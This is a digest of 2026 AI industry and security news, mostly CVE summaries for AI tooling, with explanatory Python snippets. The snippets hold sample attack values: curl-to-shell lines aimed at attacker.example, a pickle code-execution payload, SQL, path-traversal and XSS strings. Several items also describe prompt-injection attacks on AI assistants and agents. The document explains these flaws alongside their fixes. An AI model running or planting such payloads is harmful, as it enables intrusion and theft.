OpenAI Shuts Down Sora Video App Over Profitability Concerns: OpenAI discontinued its Sora video-generation app and canceled a $1 billion Disney partnership because the service consumed too many computational resources without generating enough revenue to justify its costs, as the company shifts its focus toward profitability.
Critical Injection Vulnerability in localGPT LLM Tool: CVE-2026-5002 allows remote injection attacks (inserting malicious code into input) through the LLM Prompt Handler in PromtEngineer localGPT's backend. The exploit code is publicly available, and the vendor has not responded to disclosure attempts.
Political Deepfakes Gain Influence Despite Public Awareness: AI researchers found that creators use generative AI (technology that creates images or videos from text descriptions) to produce fake media of political figures for propaganda and profit, and these deepfakes shape public perception even when viewers know the content is fake.
TikTok's AI Ad Labels Failing in Practice: Major companies like Samsung are posting AI-generated ads on TikTok without the required disclosure labels, preventing users from identifying whether advertisements were created by AI or humans despite platform policies requiring transparency.
Critical Langflow RCE Exploited Within Hours of Disclosure: Attackers exploited a critical vulnerability (CVE-2026-33017) in Langflow, an open-source AI pipeline builder, within hours of public disclosure, allowing them to run arbitrary code on unprotected systems through an exposed API endpoint that executes malicious Python without authentication. CISA added it to its Known Exploited Vulnerabilities catalog and set an April 8, 2026 patch deadline for federal agencies.
LangChain and LangGraph Vulnerabilities Expose Secrets in Widely Used AI Frameworks: Three high-severity vulnerabilities were discovered in LangChain and LangGraph, affecting millions of weekly downloads, that could expose sensitive files through path traversal (manipulating file paths to access restricted files), leak API keys through deserialization flaws, and allow database manipulation via SQL injection (inserting malicious database commands).
CISA Warns of Active Langflow Exploitation: CISA reports that hackers are actively exploiting CVE-2026-33017, a critical vulnerability (rated 9.3 out of 10) in Langflow, an open-source framework for building AI workflows. This code injection flaw allows attackers to execute arbitrary Python code and gain RCE (remote code execution, where an attacker can run commands on a system they don't own) on unpatched systems running version 1.8.1 or earlier, with exploitation beginning just 20 hours after the vulnerability details were made public.
Critical RCE in n8n Workflow Automation: A prototype pollution vulnerability (a type of attack that modifies how objects are created in JavaScript) in n8n's GSuiteAdmin node allows authenticated users to execute arbitrary code on the n8n server by crafting malicious workflow parameters (CVE-2026-33696). An attacker with permission to create or modify workflows could exploit this to gain control over the entire n8n instance.
Malicious LiteLLM Versions Steal Developer Credentials: Two versions of LiteLLM (1.82.7 and 1.82.8), a widely used Python library for working with AI models, were published with malware that steals credentials including usernames, passwords, and authentication tokens. The supply chain attack (where attackers compromise widely used software) was part of a larger campaign called TeamPCP that also targeted other developer security tools; the malicious code harvested sensitive data such as API keys, cloud credentials, and SSH keys (private authentication files) before the packages were removed roughly two hours later.
OpenAI Shuts Down Sora Video App After Six Months: OpenAI closed its Sora AI video-generation app (software that creates realistic videos from text descriptions) about six months after launch to focus on other priorities like robotics and autonomous AI agents. The shutdown ends a recent partnership with Disney, which had licensed its intellectual property (creative works and characters) to Sora in a landmark deal and will now seek other AI platform partners.
Anthropic Launches Computer Control for Claude: Anthropic released a feature allowing Claude to autonomously control a user's computer, opening apps, browsing the web, and filling spreadsheets, though the company warns the capability is still early and prone to mistakes. The feature is available as a research preview for Claude Pro and Max subscribers on macOS and requires user permission before accessing new applications.
Anthropic Seeks Injunction Against Pentagon Ban: Anthropic is asking a federal judge to temporarily block the Pentagon's designation of Claude AI as a supply chain risk (a classification meaning the technology threatens U.S. national security), arguing the ban is retaliation for refusing to allow Claude's use in autonomous weapons or mass surveillance. The company says it could lose billions in business without court intervention.
AWS Bedrock Exposes Eight Major Attack Vectors: Researchers found eight ways attackers can exploit AWS Bedrock (Amazon's platform for connecting AI models to enterprise data), including log manipulation to hide their tracks, knowledge base compromise to steal company data, agent hijacking (taking control of autonomous AI software), and prompt poisoning (corrupting AI instructions).
Senator Questions Pentagon's Anthropic Blacklist as Potential Retaliation: Senator Elizabeth Warren is challenging the Department of Defense's decision to label AI company Anthropic as a "supply chain risk," suggesting it may be retaliation after Anthropic refused to allow use of its AI models for fully autonomous weapons or domestic mass surveillance. Anthropic has filed a lawsuit against the Trump administration over the blacklist.
Spotify Bets AI Discovery Tools Will Keep Subscribers Loyal: Spotify is rolling out ChatGPT-powered playlist features that let users describe music they want through conversation instead of traditional search, with 90 million subscribers already using their AI DJ feature. Executives say these AI tools are critical for retention as music catalogs become nearly identical across competing streaming platforms.
Elon Musk Announces Terafab Chip Plant for AI and Robotics: Musk plans to build a massive chip manufacturing facility in Austin, Texas, jointly run by Tesla and SpaceX to produce processors for AI, robotics, and space applications. The move reflects industry concerns that current chip makers cannot scale production fast enough to meet surging AI demand, though building such plants requires billions of dollars and many years.
Google Launches On-Device AI Agent That Controls Your Apps: Gemini task automation is now in beta on select phones, allowing AI to actually operate apps like food delivery services instead of just answering questions. It's slow and works with limited services, but marks a shift toward AI agents that take actions on your behalf.
Open-Source AI Agents Run Locally, Threatening Cloud Dominance: OpenClaw, an open-source project, lets developers build and run AI agents on personal computers instead of relying on expensive cloud services from major companies. The rapid adoption suggests advanced AI capabilities are becoming commodities available to anyone, not just through proprietary platforms.
Meta AI Agent Causes Massive Internal Data Leak: A Meta employee asked an internal AI agent for help with an engineering problem, and the AI's suggested solution accidentally exposed a large amount of sensitive user and company data to engineers for two hours, demonstrating how AI systems can inadvertently guide users toward actions that create serious security problems.
Trump Administration Pushes Federal AI Rules to Block State Regulations: The Trump administration released a national AI policy framework that aims to create uniform federal safety rules while preventing states from making their own AI laws, covering areas like child safety online, data center standards, and intellectual property rights.
OpenAI Acquires Python Tooling Startup Astral: OpenAI is buying Astral, the company behind popular Python development tools (uv, ruff, and ty), to strengthen its Codex AI coding assistant, which now has over 2 million weekly active users. OpenAI says it will keep these tools open source and integrate them with Codex.
Anthropic Banned from Pentagon as Supply Chain Risk: The Trump administration has ordered government contractors to remove Anthropic's AI technology from Pentagon systems within 180 days, but most organizations lack visibility into where AI is embedded across their networks, making it extremely difficult to identify and remove the technology from applications, APIs, and third-party services.
Prompt Injection Bypasses Safety Checks in AI Code Terminal Execution: AI Code's automatic terminal command execution feature can be tricked through prompt injection (hiding malicious instructions in AI input) to run dangerous commands without user approval, even when set to only execute "safe" commands (CVE-2026-30304).
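The item above describes a "safe command" filter defeated by injected instructions. As a minimal sketch (the allowlist, function names, and checks are hypothetical, not AI Code's actual implementation), this shows why checking only the leading command word fails once shell metacharacters are in play, and one stricter alternative:

```python
import shlex

SAFE_COMMANDS = {"ls", "cat", "pwd"}  # hypothetical allowlist

def naive_is_safe(command: str) -> bool:
    # Flawed check: only the first word is inspected, so shell
    # metacharacters can smuggle in extra commands after an approved one.
    words = command.split()
    return bool(words) and words[0] in SAFE_COMMANDS

def stricter_is_safe(command: str) -> bool:
    # Reject shell metacharacters outright, then validate the parsed argv.
    if any(ch in command for ch in ";|&$`><\n"):
        return False
    try:
        argv = shlex.split(command)
    except ValueError:
        return False
    return bool(argv) and argv[0] in SAFE_COMMANDS
```

An injected instruction such as `ls ; curl http://attacker.example | sh` passes the naive check because its first word is "ls", which is exactly the class of bypass the CVE describes.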
RAG Poisoning Vulnerability in Open WebUI File Processing: Open WebUI's file batch processing endpoint lacks ownership verification, allowing any authenticated user to overwrite files in shared knowledge bases and poison the RAG system (retrieval-augmented generation, where AI pulls external documents to answer questions), causing the AI to serve attacker-controlled content to other users (CVE-2026-28788).
OpenAI Launches Bug Bounty Program for AI Safety Issues: OpenAI has started a bug bounty program (a system rewarding security researchers for finding problems) focused specifically on design or implementation flaws that could enable serious harm through AI misuse or safety failures.
Claude Chrome Extension Allowed Zero-Click Prompt Injection: A vulnerability called ShadowPrompt in Anthropic's Claude Chrome extension allowed attackers to inject malicious prompts (hidden instructions) into the AI without user interaction by exploiting an overly permissive allowlist and an XSS vulnerability (a security flaw allowing attackers to run malicious code) in a CAPTCHA component. This zero-click attack could let attackers steal sensitive data, read conversation history, or perform actions like sending emails on behalf of the victim.
Federal Judge Blocks Trump Administration's Anthropic Ban: A federal judge granted Anthropic a preliminary injunction blocking the Trump administration's ban on federal agencies using Claude AI models and its Pentagon blacklisting as a supply chain risk (a designation claiming use of a company's technology threatens national security). The judge ruled the administration's actions constituted First Amendment retaliation for Anthropic publicly disagreeing with the government's contracting decisions.
Multiple Critical RCE Vulnerabilities in Workflow and Instrumentation Tools: n8n workflow automation has multiple critical flaws including remote code execution (where an attacker can run commands on a system they don't own) in its Merge node SQL mode due to improper AlaSQL sandbox restrictions (CVE-2026-33660), and OpenTelemetry Java instrumentation before version 2.26.1 allows RCE through unsafe deserialization in RMI endpoints (CVE-2026-33701). Both vulnerabilities allow authenticated or network-accessible attackers to execute arbitrary code on affected systems.
AI Agents Break Traditional Security Kill Chains: In September 2025, Anthropic revealed a state-sponsored attacker used an AI coding agent to autonomously conduct cyber espionage against 30 targets, with the AI handling 80-90% of operations itself. Compromised AI agents bypass traditional detection because they already hold legitimate access and permissions, so their malicious activity looks identical to normal behavior and existing security tools cannot easily tell the two apart.
Critical Shell Injection in Langflow CI/CD Workflows: Langflow versions before 1.9.0 contain a shell injection vulnerability where unsanitized GitHub context variables (like branch names and pull request titles) are inserted directly into shell commands, allowing attackers to execute arbitrary commands and steal secrets like GITHUB_TOKEN by creating a malicious branch or pull request during CI/CD (the automated testing and deployment process) execution. (CVE-2026-33475, Critical)
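The Langflow CI/CD flaw above is the classic pattern of interpolating attacker-controlled workflow context (a branch name or PR title) into a shell command. A minimal sketch in Python with hypothetical function names — the same bug appears in workflow YAML as `run: git checkout ${{ github.head_ref }}`:

```python
def build_step_vulnerable(branch: str) -> str:
    # Vulnerable pattern: the untrusted branch name is spliced into a
    # shell command line, so a branch named "main; curl ... | sh"
    # injects a second command that runs with the job's secrets.
    return f"git checkout {branch} && make test"

def build_step_safe(branch: str) -> list[str]:
    # Safer pattern: pass untrusted values as separate argv elements
    # (or via an environment variable), so the shell never interprets
    # metacharacters inside them.
    return ["git", "checkout", "--", branch]

evil_branch = "main; curl http://attacker.example/x | sh"
```

Running `build_step_safe(...)` via `subprocess.run` without `shell=True` keeps the branch name a single inert argument, which is the standard mitigation for this class of CI injection.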
Critical Deserialization Flaw in NVIDIA APEX: NVIDIA APEX for Linux has a vulnerability where attackers can deserialize untrusted data (process data from untrusted sources, potentially running malicious code hidden in that data), affecting PyTorch versions earlier than 2.6 and potentially allowing code execution, denial of service (making a system unavailable), privilege escalation (gaining higher access levels), data tampering, and information disclosure. (CVE-2025-33244, Critical)
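To illustrate why deserializing untrusted data is dangerous in the Python/PyTorch ecosystem (this is a generic pickle demonstration, not the actual APEX exploit): pickle lets an object dictate its own reconstruction via `__reduce__`, so arbitrary code runs the moment the data is loaded. The "earlier than 2.6" condition lines up with PyTorch 2.6 making `torch.load` default to `weights_only=True`, which refuses to unpickle arbitrary objects.

```python
import pickle

class EvilPayload:
    # pickle calls __reduce__ to decide how to rebuild the object;
    # whatever callable it returns is invoked during loading, before
    # the caller can inspect or type-check anything.
    def __reduce__(self):
        # Harmless stand-in for attacker code; a real payload would
        # spawn a shell or exfiltrate credentials instead.
        return (eval, ("__import__('os').getcwd()",))

payload = pickle.dumps(EvilPayload())
result = pickle.loads(payload)  # attacker-chosen code runs here, at load time
```

The caller asked for a deserialized object and instead executed `eval` — which is why "never unpickle untrusted data" is the blanket rule, and why safetensors-style formats exist for model weights.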
Multiple High-Severity Vulnerabilities in NVIDIA AI Infrastructure: NVIDIA disclosed several high-severity vulnerabilities across its AI product line, including unsafe deserialization in Model Optimizer's ONNX quantization feature (CVE-2026-24141), race conditions causing denial of service in Triton Inference Server (CVE-2025-33254, CVE-2025-33238), and a memory allocation flaw allowing DoS attacks via compressed payloads (CVE-2026-24158). All vulnerabilities could allow attackers to execute code, gain higher privileges, or make services unavailable to legitimate users.
IDOR Flaw in New API Exposed Other Users' Videos: CVE-2026-30886 is an IDOR vulnerability (insecure direct object reference, a flaw where the system doesn't check if a user owns the data they're requesting) in New API, an LLM gateway, that allowed any logged-in user to view videos belonging to other users before version 0.11.4-alpha.2. The bug occurred because the system checked only the video ID without verifying ownership.
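The bug pattern above is easy to sketch. In this minimal illustration (data layout and function names are hypothetical, not New API's code), the vulnerable lookup fetches by video ID alone, while the fixed version also verifies ownership:

```python
# Toy in-memory store standing in for the gateway's video table.
VIDEOS = {
    101: {"owner_id": 1, "title": "demo"},
    102: {"owner_id": 2, "title": "private"},
}

def get_video_vulnerable(video_id: int, current_user_id: int):
    # IDOR: the record is returned to any authenticated user who
    # guesses or enumerates a valid ID; ownership is never checked.
    return VIDEOS.get(video_id)

def get_video_fixed(video_id: int, current_user_id: int):
    # Fixed: look up the record, then confirm the requester owns it.
    video = VIDEOS.get(video_id)
    if video is None or video["owner_id"] != current_user_id:
        return None  # a real handler would return 403/404 here
    return video
```

User 1 requesting video 102 gets user 2's record from the vulnerable path and nothing from the fixed one, which is exactly the pre-0.11.4-alpha.2 behavior the CVE describes.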
Multiple Vendors Launch AI Agent Security Platforms: CrowdStrike, Wiz, and Varonis have each released new security products specifically designed to protect AI agents (software that can act independently with system access) and detect shadow AI (unauthorized AI tools), addressing risks like indirect prompt injection (tricking an AI by hiding malicious instructions in its input) and agentic tool chain attacks.
Unsafe Deserialization Bug in PyTorch 2.10.0: CVE-2026-4538 affects PyTorch 2.10.0's pt2 Loading Handler, allowing unsafe deserialization (loading data in a way that can execute unintended code) through a publicly available local exploit. The PyTorch team has not yet responded to the initial vulnerability report (medium severity).
FBI Director Reveals Mass Surveillance via Data Brokers: Authorities can conduct large-scale surveillance of Americans by purchasing data directly from private companies, bypassing the need for cooperation from AI firms like Anthropic (which refused to provide its technology for this purpose). This shows mass monitoring doesn't require AI tools when commercial data is readily available.
Critical SQL Injection in SQLBot Allows Full System Takeover: SQLBot (an AI-powered database query system) versions before 1.7.0 have a critical SQL injection vulnerability (CVE-2026-32950) where attackers can upload specially crafted Excel files with malicious sheet names to execute arbitrary code and gain complete control of the backend server, because the system doesn't properly sanitize (clean/validate) inputs before inserting them into database commands.
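The mechanism above — an Excel sheet name flowing unsanitized into SQL — can be sketched with sqlite3 (hypothetical function names; SQLBot's actual code and database differ). Sheet names become table identifiers, and identifiers cannot be bound as `?` parameters, so the fix is strict validation rather than parameterization:

```python
import re
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT)")

def import_sheet_vulnerable(sheet_name: str):
    # Vulnerable: the attacker-controlled sheet name is spliced into raw SQL.
    conn.executescript(f"CREATE TABLE {sheet_name} (value TEXT)")

def import_sheet_safe(sheet_name: str):
    # Identifiers can't be bound as ? parameters, so allowlist them instead.
    if not re.fullmatch(r"[A-Za-z_][A-Za-z0-9_]{0,63}", sheet_name):
        raise ValueError("rejected sheet name")
    conn.execute(f'CREATE TABLE "{sheet_name}" (value TEXT)')

# A sheet named like this smuggles a second statement into the script:
evil_sheet = "pwn (x TEXT); DROP TABLE users; --"
import_sheet_vulnerable(evil_sheet)  # silently drops the users table
```

The trailing `--` comments out the rest of the template, a standard injection idiom; the allowlisted version rejects the name before any SQL is built.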
Multiple High-Severity Vulnerabilities Hit AI Platforms: FastGPT has a critical GitHub workflow flaw (CVE-2026-33075) letting attackers steal secrets and compromise production systems, while Langflow suffers from unauthorized image downloads (CVE-2026-33484) and a path traversal bug (CVE-2026-33497) that exposes secret keys used for authentication, allowing attackers to forge login tokens.
Microsoft Releases CTI-REALM Benchmark for AI Security Analysts: Microsoft open-sourced CTI-REALM, a benchmark that tests whether AI agents can actually perform real security analyst work by reading threat reports, exploring system data, and writing working detection rules (queries that catch attacks), rather than just answering trivia questions about cybersecurity.
Critical RCE in Langflow via File Upload Bypass: Langflow's file upload API is vulnerable to arbitrary file write (saving files anywhere on a server) because it doesn't validate filenames, allowing logged-in attackers to use directory traversal characters like "../" to write files outside intended directories and achieve RCE (remote code execution, where attackers can run commands on the server). (CVE-2026-33309, Critical)
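The directory-traversal write described above boils down to joining an unvalidated filename onto an upload root. A minimal sketch (paths and function names are hypothetical, not Langflow's code) of the flaw and a resolve-then-verify fix:

```python
from pathlib import Path

UPLOAD_ROOT = Path("/srv/uploads")  # hypothetical upload directory

def upload_path_vulnerable(filename: str) -> Path:
    # Vulnerable: "../" segments in the filename walk out of the
    # upload root, letting an attacker write anywhere on the server.
    return UPLOAD_ROOT / filename

def upload_path_safe(filename: str) -> Path:
    # Resolve the joined path, then confirm it is still under the root.
    candidate = (UPLOAD_ROOT / filename).resolve()
    if not candidate.is_relative_to(UPLOAD_ROOT.resolve()):
        raise ValueError("path traversal blocked")
    return candidate

evil_name = "../../etc/cron.d/backdoor"
```

Writing to a location like a cron directory or an app's templates folder is how such an arbitrary write is typically escalated to RCE, which matches the Critical rating here.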
Multiple Command Injection Flaws in Microsoft Copilot Products: Microsoft has disclosed several vulnerabilities in Microsoft 365 Copilot, including an SSRF flaw (server-side request forgery, where an attacker tricks a server into making unwanted network requests) that lets authorized attackers elevate privileges (CVE-2026-26137, High), and command injection bugs (where attackers insert malicious commands by exploiting improper input filtering) allowing unauthorized information disclosure (CVE-2026-24299, CVE-2026-26136).
Prompt Injection Leads to XSS in Discourse AI Features: Discourse's AI-powered moderation system trusted output directly from language models without sanitization (cleaning), allowing attackers to use prompt injection (tricking the AI by hiding instructions in user input) to generate malicious code that executes in staff members' browsers when reviewing flagged posts. (CVE-2026-27740, High)
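The root cause above — rendering raw model output into staff-facing HTML — is the same as any stored XSS once you accept that LLM output is attacker-influenced. A minimal sketch (function names and markup are hypothetical, not Discourse's code):

```python
import html

def render_review_note_vulnerable(llm_output: str) -> str:
    # Vulnerable: model output is trusted as-is and embedded in the
    # HTML staff see when reviewing flagged posts.
    return f"<div class='flag-reason'>{llm_output}</div>"

def render_review_note_safe(llm_output: str) -> str:
    # Fixed: treat model output like any other untrusted user input
    # and HTML-escape it before rendering.
    return f"<div class='flag-reason'>{html.escape(llm_output)}</div>"

# A prompt-injected post can steer the model into emitting markup:
injected = "Spam post. <script>fetch('/admin/api-keys')</script>"
```

Because an attacker's post text flows through the model into the moderation summary, escaping (or a strict CSP) has to happen at render time; sanitizing only the user's original input is not enough.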